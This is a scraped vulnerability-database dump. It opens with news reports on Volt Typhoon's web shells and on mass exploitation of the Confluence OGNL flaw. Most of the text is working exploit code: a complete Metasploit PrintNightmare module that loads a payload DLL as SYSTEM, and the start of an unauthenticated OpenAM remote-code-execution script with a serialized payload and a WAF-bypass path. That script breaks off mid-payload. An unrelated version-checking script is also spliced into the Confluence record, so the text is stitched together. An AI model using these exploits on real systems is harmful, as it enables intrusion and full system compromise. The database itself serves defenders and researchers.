active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest.\n\nThe findings come from CrowdStrike, which is tracking the adversary under the name **Vanguard Panda**.\n\n\"The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement,\" the cybersecurity company [said](<https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/>).\n\nVolt Typhoon, also known as Bronze Silhouette, is a [cyber espionage group](<https://thehackernews.com/2023/05/chinas-stealthy-hackers-infiltrate-us.html>) from China that's been linked to network intrusion operations against the U.S. government, defense, and other critical infrastructure organizations.\n\n\"This adversary has been known to leverage credentials and living-off-the-land techniques to remain hidden and move quickly through targeted environments,\" Tom Etheridge, chief global professional services officer at CrowdStrike, told The Hacker News.\n\nAn analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against a limited number of victims to carry out long-term malicious acts.\n\nIt has been further described as a threat group that \"favors web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives.\"\n\nIn one unsuccessful intrusion attempt against an unspecified customer, the actor targeted the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server to trigger the execution of suspicious commands pertaining to process enumeration and network connectivity, among others.
\n\n\"Vanguard Panda's actions indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for [WMI](<https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page>),\" CrowdStrike said.\n\nA closer examination of the Tomcat access logs unearthed several HTTP POST requests to /html/promotion/selfsdp.jspx, a web shell that's camouflaged as the legitimate identity security solution to sidestep detection.\n\nThe web shell is believed to have been deployed nearly six months before the aforementioned hands-on-keyboard activity, indicative of extensive prior recon of the target network.\n\nWhile it's not immediately clear how Vanguard Panda managed to breach the ManageEngine environment, all signs point to the exploitation of [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), a critical authentication bypass flaw with resultant remote code execution.\n\nIt's suspected that the threat actor deleted artifacts and tampered with the access logs to [obscure the forensic trail](<https://attack.mitre.org/techniques/T1070/>). 
However, in a glaring misstep, the process failed to account for Java source and [compiled class files](<https://en.wikipedia.org/wiki/Java_class_file>) that were generated during the course of the attack, leading to the discovery of more web shells and backdoors.\n\nThis includes a JSP file that's likely retrieved from an external server and which is designed to backdoor \"tomcat-websocket.jar\" by making use of an ancillary JAR file called \"tomcat-ant.jar\" that's also fetched remotely by means of a web shell, after which cleanup actions are performed to cover up the tracks.\n\nThe trojanized version of tomcat-websocket.jar is fitted with three new Java classes \u2013 named A, B, and C \u2013 with A.class functioning as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.\n\n\"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP in use by Vanguard Panda,\" CrowdStrike said, noting with moderate confidence that the implant is used to \"enable persistent access to high-value targets downselected after the initial access phase of operations using then zero-day vulnerabilities.\"\n\n\"In this case, [...] Vanguard Panda had an advanced understanding of the victim's environment indicating that they were persistent and went undetected prior to our technology being deployed while they carried out their reconnaissance efforts,\" Etheridge explained. \"Additionally it moved evidence, covering their tracks as they moved deeper into the victim's infrastructure.\"
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-26T05:51:00", "type": "thn", "title": "Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2023-06-27T05:21:18", "id": "THN:B0B9A91EA9A6465B7D53D33D5B8173CB", "href": "https://thehackernews.com/2023/06/chinese-hackers-using-never-before-seen.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "The U.S. 
Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. 
It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. 
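The affected and fixed version ranges listed above, turned into a check as an added example (not code from the article or from Atlassian): the ranges are encoded as data with an exclusive upper bound, so the fixed release itself is reported clean, a short form such as 7.4 is padded rather than misordered, and an unparseable build string is reported as unknown instead of being silently compared. The inventory it runs over is constructed for the example.

```python
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# Affected ranges from the advisory as quoted above:
# (first affected version, or None for "all versions before"; first fixed version).
# The upper bound is exclusive, so the fixed release is not affected.
AFFECTED_RANGES = [
    (None,        (6, 13, 23)),   # all versions prior to 6.13.23
    ((6, 14, 0),  (7, 4, 11)),    # 6.14.0 <= v < 7.4.11
    ((7, 5, 0),   (7, 11, 6)),    # 7.5.0  <= v < 7.11.6
    ((7, 12, 0),  (7, 12, 5)),    # 7.12.0 <= v < 7.12.5
]
# 7.13.0 is also listed as fixed; it falls outside every range above.


def parse_version(text: str) -> Version:
    """'7.12.4' -> (7, 12, 4). Shorter strings are padded ('7.4' -> (7, 4, 0));
    anything non-numeric is rejected rather than compared as text."""
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable Confluence version: {text!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def affected_range(version: Version) -> Optional[Tuple[Optional[Version], Version]]:
    """The (low, fixed) range containing the version, or None if it is not affected."""
    for low, fixed in AFFECTED_RANGES:
        if (low is None or version >= low) and version < fixed:
            return low, fixed
    return None


def is_vulnerable(version_text: str) -> bool:
    return affected_range(parse_version(version_text)) is not None


def remediation_target(version_text: str) -> Optional[str]:
    """The fixed release on the same branch, or None when the version is not affected."""
    rng = affected_range(parse_version(version_text))
    return None if rng is None else ".".join(map(str, rng[1]))


def assess_inventory(inventory: Dict[str, str]) -> Dict[str, str]:
    """host -> 'upgrade to X' / 'not affected' / 'unknown version'."""
    verdicts: Dict[str, str] = {}
    for host, ver in inventory.items():
        try:
            target = remediation_target(ver)
        except ValueError:
            verdicts[host] = "unknown version"
            continue
        verdicts[host] = "not affected" if target is None else f"upgrade to {target}"
    return verdicts


# Constructed inventory for the example, not real hosts.
SAMPLE_INVENTORY = {
    "wiki-prod": "7.12.4",
    "wiki-lts": "7.4.11",
    "wiki-legacy": "6.13.22",
    "wiki-test": "7.13.0",
    "wiki-odd": "7.12.4-SNAPSHOT",
}

if __name__ == "__main__":
    for host, verdict in assess_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
```

Note that a version such as 7.4.12 sits between two ranges and is reported as not affected, which matches the advisory's structure (each maintained branch got its own fix release); a naive "less than the newest fixed version" comparison would wrongly flag the patched LTS branch.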
Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. 
Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-25T15:25:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-25T00:00:00", "type": "packetstorm", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "PACKETSTORM:167261", "href": "https://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'windows_error' \nrequire 'ruby_smb' \nrequire 'ruby_smb/error' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::Retry \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Deprecated \n \nmoved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare' \n \nPrintSystem = RubySMB::Dcerpc::PrintSystem \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Print Spooler Remote DLL Injection', \n'Description' => %q{ \nThe print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted \nDCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN \nvector which requires the Print Spooler service to be running. 
\n}, \n'Author' => [ \n'Zhiniang Peng', # vulnerability discovery / research \n'Xuefeng Li', # vulnerability discovery / research \n'Zhipeng Huo', # vulnerability discovery \n'Piotr Madej', # vulnerability discovery \n'Zhang Yunhai', # vulnerability discovery \n'cube0x0', # PoC \n'Spencer McIntyre', # metasploit module \n'Christophe De La Fuente', # metasploit module co-author \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'SRVHOST' => Rex::Socket.source_address \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win', \n'Arch' => [ ARCH_X64, ARCH_X86 ] \n}, \n], \n], \n'DisclosureDate' => '2021-06-08', \n'References' => [ \n['CVE', '2021-1675'], \n['CVE', '2021-34527'], \n['URL', 'https://github.com/cube0x0/CVE-2021-1675'], \n['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], \n['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], \n['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] \n], \n'Notes' => { \n'AKA' => [ 'PrintNightmare' ], \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK # the dll will be copied to the remote server \n] \n} \n) \n) \n \nregister_advanced_options( \n[ \nOptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ]) \n] \n) \nderegister_options('AutoCheck') \nend \n \ndef check \nbegin \nconnect(backend: :ruby_smb) \nrescue Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown('Failed to connect to the remote service.') \nend \n \nbegin \nsmb_login \nrescue Rex::Proto::SMB::Exceptions::LoginError \nreturn Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.') \nend \n \nbegin \ndcerpc_bind_spoolss \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nif nt_status == 
::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND \nprint_error(\"The 'Print Spooler' service is disabled.\") \nend \nreturn Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\") \nend \n \n@target_arch = dcerpc_getarch \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43 \nif @target_arch == ARCH_X64 \n@environment = 'Windows x64' \nelsif @target_arch == ARCH_X86 \n@environment = 'Windows NT x86' \nelse \nreturn Exploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \nprint_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\") \n \nprint_status('Enumerating the installed printer drivers...') \ndrivers = enum_printer_drivers(@environment) \n@driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\" \nvprint_status(\"Using driver path: #{@driver_path}\") \n \nprint_status('Retrieving the path of the printer driver directory...') \n@config_directory = get_printer_driver_directory(@environment) \nvprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil? 
\n \ncontainer = driver_container( \np_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', \np_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\" \n) \n \ncase add_printer_driver_ex(container) \nwhen nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code \nreturn Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.') \nwhen ::WindowsError::Win32::ERROR_PATH_NOT_FOUND \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_BAD_NET_NAME \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_ACCESS_DENIED \nreturn Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.') \nend \n \nExploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \ndef run \nfail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil? \nfail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil? 
\n \nsuper \nend \n \ndef setup \nif Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 \nfail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') \nend \n \nsuper \nend \n \ndef start_service \nfile_name << '.dll' \nself.file_contents = generate_payload_dll \n \nsuper \nend \n \ndef primer \ndll_path = unc \nif dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/ \n# targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass \n# otherwise the operation will fail with ERROR_INVALID_PARAMETER \ndll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\" \nend \nvprint_status(\"Using DLL path: #{dll_path}\") \n \nfilename = dll_path.rpartition('\\\\').last \ncontainer = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path) \n \n3.times do \nadd_printer_driver_ex(container) \nend \n \n1.upto(3) do |directory| \ncontainer.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#(unknown)\") \nbreak if add_printer_driver_ex(container).nil? 
\nend \n \ncleanup_service \nend \n \ndef driver_container(**kwargs) \nPrintSystem::DriverContainer.new( \nlevel: 2, \ntag: 2, \ndriver_info: PrintSystem::DriverInfo2.new( \nc_version: 3, \np_name_ref_id: 0x00020000, \np_environment_ref_id: 0x00020004, \np_driver_path_ref_id: 0x00020008, \np_data_file_ref_id: 0x0002000c, \np_config_file_ref_id: 0x00020010, \n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 \np_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\", \np_environment: @environment, \np_driver_path: @driver_path, \n**kwargs \n) \n) \nend \n \ndef dcerpc_bind_spoolss \nhandle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss']) \nvprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nvprint_status(\"Bound to #{handle} ...\") \nend \n \ndef enum_printer_drivers(environment) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length \nDriverInfo2.read(response.p_drivers.map(&:chr).join) \nend \n \ndef get_printer_driver_directory(environment) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length \nRubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT') \nend \n \ndef add_printer_driver_ex(container) \nflags = PrintSystem::APD_INSTALL_WARNED_DRIVER | 
PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES \n \nbegin \nresponse = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags) \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nmessage = \"Error #{nt_status.name} (#{nt_status.description})\" \nif nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN \n# STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected \nprint_status('The named pipe connection was broken, reconnecting...') \nreconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do \ndcerpc_bind_spoolss \nrescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e \nfalse \nelse \ntrue \nend \n \nunless reconnected \nvprint_status('Failed to reconnect to the named pipe.') \nreturn nil \nend \n \nprint_status('Successfully reconnected to the named pipe.') \nretry \nelse \nprint_error(message) \nend \n \nreturn nt_status \nend \n \nerror = ::WindowsError::Win32.find_by_retval(response.error_status.value).first \nmessage = \"RpcAddPrinterDriverEx response #{response.error_status}\" \nmessage << \" #{error.name} (#{error.description})\" unless error.nil? 
\nvprint_status(message) \nerror \nend \n \ndef rprn_call(name, **kwargs) \nrequest = PrintSystem.const_get(\"#{name}Request\").new(**kwargs) \n \nbegin \nraw_response = dcerpc.call(request.opnum, request.to_binary_s) \nrescue Rex::Proto::DCERPC::Exceptions::Fault => e \nfail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\") \nend \n \nPrintSystem.const_get(\"#{name}Response\").read(raw_response) \nend \n \nclass DriverInfo2Header < BinData::Record \nendian :little \n \nuint32 :c_version \nuint32 :name_offset \nuint32 :environment_offset \nuint32 :driver_path_offset \nuint32 :data_file_offset \nuint32 :config_file_offset \nend \n \n# this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2 \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 \nDriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do \ndef self.read(data) \nheader = DriverInfo2Header.read(data) \nnew( \nheader, \nRubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT') \n) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167261/cve_2021_1675_printnightmare.rb.txt"}, {"lastseen": "2021-07-16T15:00:53", "description": "", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "packetstorm", "title": "ForgeRock Access Manager/OpenAM 14.6.3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 
["CVE-2021-35464"], "modified": "2021-07-16T00:00:00", "id": "PACKETSTORM:163525", "href": "https://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 2021-07-14 \n# Exploit Author: Photubias \u2013 tijl[dot]deneut[at]Howest[dot]be for www.ic4.be \n# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 \n# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ \n# Version: [1] OpenAM 14.6.3 \n# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 \n# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 \n# CVE: CVE-2021-35464 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2021 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-35464.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 3. 
\nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nRewritten from and full credits to @Y4er_ChaBug: \nhttps://github.com/Y4er/openam-CVE-2021-35464 \nand of course the discoverer @artsploit: \nhttps://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 \nCreated using https://github.com/frohoff/ysoserial \n''' \n \nimport urllib.request, urllib.parse, ssl, sys, optparse \n \n## Static vars; change at will, but recommend leaving as is \nsURL = 'http://192.168.0.100:7080/openam' \nsEndpoint = 'ccversion/Version' \nsEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs \niTimeout = 5 \nstrSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-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-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAA